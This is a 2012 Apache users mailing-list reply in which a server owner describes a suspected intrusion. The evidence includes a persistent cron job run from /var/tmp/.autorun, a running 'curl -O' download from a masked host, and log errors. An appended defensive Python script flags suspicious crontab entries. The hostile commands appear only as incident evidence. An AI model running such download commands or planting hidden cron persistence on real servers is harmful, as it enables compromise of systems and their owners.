From: luisa2010@xxxxxxxxxxx
To: users@xxxxxxxxxxxxxxxx
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300

> Date: Mon, 9 Jan 2012 17:30:21 +0000
> From: tevans.uk@xxxxxxxxxxxxxx
> To: users@xxxxxxxxxxxxxxxx
> Subject: Re: FW: attack on apache
>
> On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
> <luisa2010@xxxxxxxxxxx> wrote:
> >
> > I didn't have any cronjobs but when I detected the attack I saw one in
> > /var/spool/cron
> > My logfile says
> > User apache:
> >
> > /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> >
> > personal crontab deleted: 56 Time(s)
> >
> > personal crontab listed: 1 Time(s)
> >
> > personal crontab replaced: 1 Time(s)
> >
> > Thanks
> >
>
> Google tells me that this is output from a cpanel perl script -
> probably a crontab editor. crontabs are not evidence of an attack.
>
> You need to show more details of what you think is happening, and why
> you think it is malicious.
>
> Cheers
>
> Tom

I think it is an attack because I found these commands running on my server (with owner apache)

/usr/local/apache/bin/httpd - DSFSL
sh -c curl -O http://xxxx

I also found a folder proc in /var/named/chroot. This folder is the same as /proc, is updated with the original /proc and I can't delete it.

In /var/log/httpd/error_log I see things like this

sh: del comand no found
sh: xx Permission denied

I need help!

Thanks

Luisa
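
An added triage example, not part of the original thread or written by either poster: it reads a user's crontab text and reports jobs whose program sits in a world-writable directory or under a hidden path component, the two traits of the `/var/tmp/.autorun/update` entry quoted above. The function names, the `SERVICE_USERS` list and the sample crontab (including its schedule fields) are assumptions made for illustration.

```python
import re

# Directories any local user (including a web server account) can write to.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Assumed list of service accounts that normally own no crontab.
SERVICE_USERS = {"apache", "www-data", "httpd", "nobody"}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_entries(crontab_text):
    """Yield (schedule, command) for each job line of a user crontab."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        # "@reboot cmd" has one schedule field, the classic form has five.
        fields = 1 if line.startswith("@") else 5
        parts = line.split(None, fields)
        if len(parts) == fields + 1:
            yield " ".join(parts[:fields]), parts[fields]

def triage(user, crontab_text):
    """Return entries whose program path looks out of place, with reasons."""
    findings = []
    for schedule, command in parse_entries(crontab_text):
        program = command.split()[0]
        reasons = []
        if program.startswith(WORLD_WRITABLE):
            reasons.append("program in world-writable directory")
        if any(p.startswith(".") and p not in (".", "..") for p in program.split("/")):
            reasons.append("hidden path component")
        if not reasons:
            continue
        if re.search(r">\s*/dev/null", command):
            reasons.append("output discarded")
        if user in SERVICE_USERS:
            reasons.append("crontab owned by service account")
        findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings

# Constructed sample: the schedule fields and the second job are invented.
SAMPLE = """\
MAILTO=""
* * * * * /var/tmp/.autorun/update >/dev/null 2>&1
0 3 * * * /usr/bin/find /var/cache/app -type f -mtime +7 -delete
"""

if __name__ == "__main__":
    for f in triage("apache", SAMPLE):
        print(f["command"], "->", "; ".join(f["reasons"]))
```

On a live host the input would be the contents of the file for that user under /var/spool/cron; a finding is a prompt to inspect the referenced file and its timestamps, not proof of compromise on its own.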